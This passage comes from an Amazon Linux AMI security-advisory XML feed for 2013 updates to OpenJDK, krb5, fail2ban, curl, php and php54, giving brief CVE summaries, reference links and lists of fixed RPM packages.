It was discovered that the AWT component did not properly manage certain resources and that the ObjectStreamClass of the Serialization component did not properly handle circular references. An untrusted Java application or applet could possibly use these flaws to cause a denial of service.
CVE-2013-2443:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2412:
It was discovered that JConsole did not properly inform the user when establishing an SSL connection failed. An attacker could exploit this flaw to gain access to potentially sensitive information.
CVE-2013-2407:
It was discovered that the Libraries component contained certain errors related to XML security and the class loader. A remote attacker could possibly exploit these flaws to bypass intended security mechanisms or disclose potentially sensitive information and cause a denial of service.
CVE-2013-1571:
It was found that documentation generated by Javadoc was vulnerable to a frame injection attack. If such documentation was accessible over a network, and a remote attacker could trick a user into visiting a specially-crafted URL, it would lead to arbitrary web content being displayed next to the documentation. This could be used to perform a phishing attack by providing frame content that spoofed a login form on the site hosting the vulnerable documentation.
CVE-2013-1500:
It was discovered that the 2D component created shared memory segments with insecure permissions. A local attacker could use this flaw to read or write to the shared memory segment.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1500" title="" id="CVE-2013-1500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1571" title="" id="CVE-2013-1571" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2407" title="" id="CVE-2013-2407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2412" title="" id="CVE-2013-2412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2443" title="" id="CVE-2013-2443" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2444" title="" id="CVE-2013-2444" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2445" title="" id="CVE-2013-2445" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2446" title="" id="CVE-2013-2446" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2447" title="" id="CVE-2013-2447" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2448" title="" id="CVE-2013-2448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2450" title="" id="CVE-2013-2450" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2452" title="" id="CVE-2013-2452" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2453" title="" id="CVE-2013-2453" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2455" title="" id="CVE-2013-2455" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2456" title="" id="CVE-2013-2456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2457" title="" id="CVE-2013-2457" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2459" title="" id="CVE-2013-2459" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2461" title="" id="CVE-2013-2461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2463" title="" id="CVE-2013-2463" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465" title="" id="CVE-2013-2465" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2469" title="" id="CVE-2013-2469" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2470" title="" id="CVE-2013-2470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2471" title="" id="CVE-2013-2471" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2472" title="" id="CVE-2013-2472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2473" title="" id="CVE-2013-2473" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1014.html" title="" id="RHSA-2013:1014" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-62.1.11.11.90.55.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-62.1.11.11.90.55.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-62.1.11.11.90.55.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" 
release="62.1.11.11.90.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-62.1.11.11.90.55.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-62.1.11.11.90.55.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-62.1.11.11.90.55.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-62.1.11.11.90.55.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-62.1.11.11.90.55.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-62.1.11.11.90.55.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-62.1.11.11.90.55.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-62.1.11.11.90.55.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-62.1.11.11.90.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-208</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-208: medium priority package update for krb5</title><issued date="2013-07-12 15:31:00" /><updated date="2014-09-15 23:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2002-2443:
It was found that kadmind's kpasswd service did not perform any validation on incoming network packets, causing it to reply to all requests. A remote attacker could use this flaw to send spoofed packets to a kpasswd service that appear to come from kadmind on a different server, causing the two services to keep replying to each other's packets, consuming network bandwidth and CPU.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2443" title="" id="CVE-2002-2443" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0942.html" title="" id="RHSA-2013:0942" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-server-ldap" version="1.10.3" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.10.3-10.26.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.10.3" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.10.3-10.26.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.10.3" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.10.3-10.26.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.10.3" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.10.3-10.26.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.10.3-10.26.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.10.3-10.26.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.10.3" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.10.3-10.26.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.10.3" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.10.3-10.26.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.10.3" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.10.3-10.26.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.10.3" release="10.26.amzn1" 
epoch="0" arch="i686"><filename>Packages/krb5-server-1.10.3-10.26.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.10.3-10.26.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.10.3" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.10.3-10.26.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.10.3-10.26.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.10.3" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.10.3-10.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-209</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-209: medium priority package update for fail2ban</title><issued date="2013-07-12 15:31:00" /><updated date="2014-09-15 23:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2178:
973756:
CVE-2013-2178 fail2ban: remote denial of service due to apache log parsing issue
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2178" title="" id="CVE-2013-2178" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="fail2ban" version="0.8.10" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/fail2ban-0.8.10-1.3.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-210</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-210: medium priority package update for curl</title><issued date="2013-07-12 15:32:00" /><updated date="2014-09-15 23:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1944:
The tailMatch function in cookie.c in cURL and libcurl before 7.30.0 does not properly match the path domain when sending cookies, which allows remote attackers to steal cookies via a matching suffix in the domain of a URL.
A flaw was found in the way libcurl matched domains associated with cookies. This could lead to cURL or an application linked against libcurl sending the wrong cookie if only part of the domain name matched the domain associated with the cookie, disclosing the cookie to unrelated hosts.
950577:
CVE-2013-1944 curl: Cookie domain suffix match vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1944" title="" id="CVE-2013-1944" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.27.0" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.27.0-11.34.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.27.0" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.27.0-11.34.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.27.0" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.27.0-11.34.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.27.0" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.27.0-11.34.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.27.0" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.27.0-11.34.amzn1.i686.rpm</filename></package><package name="curl" version="7.27.0" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.27.0-11.34.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.27.0" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.27.0-11.34.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.27.0" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.27.0-11.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-211</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-211: critical priority package update for php</title><issued date="2013-07-12 15:56:00" /><updated date="2014-09-15 23:17:00" /><severity>critical</severity><description>Package updates are available for Amazon 
Linux AMI that fix the following vulnerabilities:
CVE-2013-4113:
A buffer overflow flaw was found in the way PHP parsed deeply nested XML documents. If a PHP application used the xml_parse_into_struct() function to parse untrusted XML content, an attacker able to supply specially-crafted XML could use this flaw to crash the application or, possibly, execute arbitrary code with the privileges of the user running the PHP interpreter.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4113" title="" id="CVE-2013-4113" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1049.html" title="" id="RHSA-2013:1049" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-fpm" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package 
name="php-gd" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.27" 
release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-enchant" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-enchant-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.27" release="1.0.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-intl-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-enchant" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-enchant-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.27" release="1.0.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-cli-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-recode-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.27" release="1.0.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-tidy-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.27-1.0.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-212</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-212: critical priority package update for php54</title><issued date="2013-07-12 15:56:00" /><updated date="2014-09-15 23:18:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4113:
A buffer overflow flaw was found in the way PHP parsed deeply nested XML documents. If a PHP application used the xml_parse_into_struct() function to parse untrusted XML content, an attacker able to supply specially-crafted XML could use this flaw to crash the application or, possibly, execute arbitrary code with the privileges of the user running the PHP interpreter.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4113" title="" id="CVE-2013-4113" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1049.html" title="" id="RHSA-2013:1049" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-bcmath" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.17" release="2.40.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-mbstring-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-gd" 
